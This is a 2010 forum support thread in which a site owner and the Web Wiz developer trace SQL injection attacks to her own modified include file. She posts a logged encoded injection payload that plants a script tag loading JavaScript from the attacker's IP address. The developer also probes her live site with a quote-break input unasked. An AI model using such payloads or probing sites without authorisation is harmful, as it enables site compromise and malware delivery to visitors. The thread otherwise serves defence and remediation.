| Author |
 Topic Search  Topic Options
|
diaperpin-jen 
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
|
 Post Options
 Thanks(0)
 Quote  Reply
 Topic: VIRUS Attack
Posted: 05 April 2010 at 1:16pm |
My web site has been attacked 3 days in a row via sql injections. I spent yesterday locking down all of my code to remove the possibility of a hacker updating my database. I did NOT touch the Web Wiz forum or Newspad code because I did not want to risk making a mess code I have not written.
I have many tables in my site but the only ones targeted were web wiz forums and web wiz newspad. Therefore I believe the hackers are familiar with Web Wiz table structures.
I am psting this note for two reasons.
First, to warn other web wiz customers that this is happening so you are ready just in case you are targeted as well.
Secondly to ask if others have had such a problem and if there are suggestions to close up any gaps, particularly from the forum or newspad code???
|
 |
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
|
Post Options
Thanks(0)
Quote Reply
Posted: 05 April 2010 at 1:41pm |
|
There are no issue with SQL Injections in Web Wiz Forums or Web Wiz NewsPad.
These virus have been around along time and are generic attacking the structure of any database schema not just Web Wiz software. When they first appeared a few years ago we saw Web Wiz Forums and NewsPad installations get hit as many times as 20 per second by these SQL Injection Viruses, without causing any issues.
Over the last few years we have had a number of people who have had their databases compromised by these SQL Injection Virus convinced that the problem has been with Web Wiz Products, however after lengthy investigations it has always turned out the issue was caused by their own pages outside of Web Wiz software or modifications to the software.
I can be 100% sure that your SQL Injections will not be a result of Web Wiz Forums or NewsPad. You should look at your own pages on your website and any modifications that you have made to the Web Wiz software.
Many 1,000's of hours has and still is spent on security making sure that our products are the most secure available. Each month security audits are carried out looking at new threats and releasing new versions if any thing is found. For this reason many large hacking websites use our software and have also worked with us simulating attacks and looking for holes to ensure that our software is fully secure.
Web Wiz Forums and NewsPad is well protected against SQL Injection, it even goes as far in Web Wiz Forums 9.50 and above to detect an SQL Injection attack from one of these viruses and when detected stops the page processing to reduce server load and prevent DoS attacks that could over run a web server if a website came under a large attack from one of these SQL Injection viruses.
Edited by WebWiz-Bruce - 05 April 2010 at 1:50pm
|
|
|
|
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 1:30am |
The hacker is back and I was able to log the problem.
The attack was in the form of sql injection through one of the forum pages. I am listing the information I logged below:
Page: /forum/registration_rules.asp
IP Address: 94.102.52.27
QueryString: FID=01+update+tblAuthor+set+Username=cast(Username+as+varchar(8000))%2Bcast(char(060)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(57)%2Bchar(52)%2Bchar(46)%2Bchar(49)%2Bchar(48)%2Bchar(50)%2Bchar(46)%2Bchar(53)%2Bchar(50)%2Bchar(46)%2Bchar(50)%2Bchar(55)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--
I want to make sure other you and web wiz software uses are aware of this problem so you can deal with it immediately. I am in danger of having much of my data wiped out by this person. Each attack seems more and more destructive.
Please look into this page and lock it down best you can.
|
|
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 10:40am |
|
I have just located your website from the email address used to register
on this forum and have found the issue, which is to do with your own
modifications!!
I have a look at your registration_rules.asp page and passed across a
non-numeric value as part of the FID querystring, I then got an error which you
would not get from an unmodified Web Wiz Forums.
The error was an SQL error on line 320 of the file
includes/google_adsense_inc.asp. The original
includes/google_adsense_inc.asp does not have a line 320 and also does
not interact with the database.
It would seem that the problem here is that you have modified the file
includes/google_adsense_inc.asp to include code that interacts with the
database. This code does not appear to have any protection from SQL Injection.
To fix the issue you should either fix the modified code in the includes/google_adsense_inc.as, or better still upgrade to the latest version and not modify the code.
|
|
|
|
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 11:43am |
Yes - Thank you. I looked into this last night and saw that the hole was in google_adsense_inc.asp.
The error you received actually indicates that my changes worked. If you didn't get the error you would have succeeded in changing the values in my database.
|
|
WebWiz-Bruce
Admin Group
Web Wiz Developer
Joined: 03 September 2001
Location: Bournemouth
Status: Offline
Points: 9844
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 12:15pm |
I have just checked your forum and it is still vunerble to an SQL Injection attack. Maybe not the one that you posted, but it is still vulnerable, see the error got below:-
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near 'test and a.author_id = p.author_id and
g.group_id = a.group_id union select g.name as groupname, a.username,
a.author_id , 2 '. |
This means that my input 'test along with the single quote break was still used in the SQL Query. This was only a test so no harm done, but I could change this to easily display content from your database, delete tables, etc.
You need to sanitise any querystring input before it is used in an SQL Query. In this case as you are using a numeric number parsed by FID querystring you can use the following:-
If isNumeric(Request.QueryString("FID")) Then
intForumID = CInt(Request.QueryString("FID"))
Else
intForumID = 0
End If |
Then in your SQL reference the variable not the querystring.
Edited by WebWiz-Bruce - 06 April 2010 at 12:18pm
|
|
|
|
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 12:39pm |
|
Thanks! I will look into it.
|
|
diaperpin-jen
Newbie
Joined: 23 May 2007
Status: Offline
Points: 13
|
Post Options
Thanks(0)
Quote Reply
Posted: 06 April 2010 at 1:20pm |
|
Fixed. I appreciate you taking the time to look at my site. I will see how you handled text inputs as well......
|
|
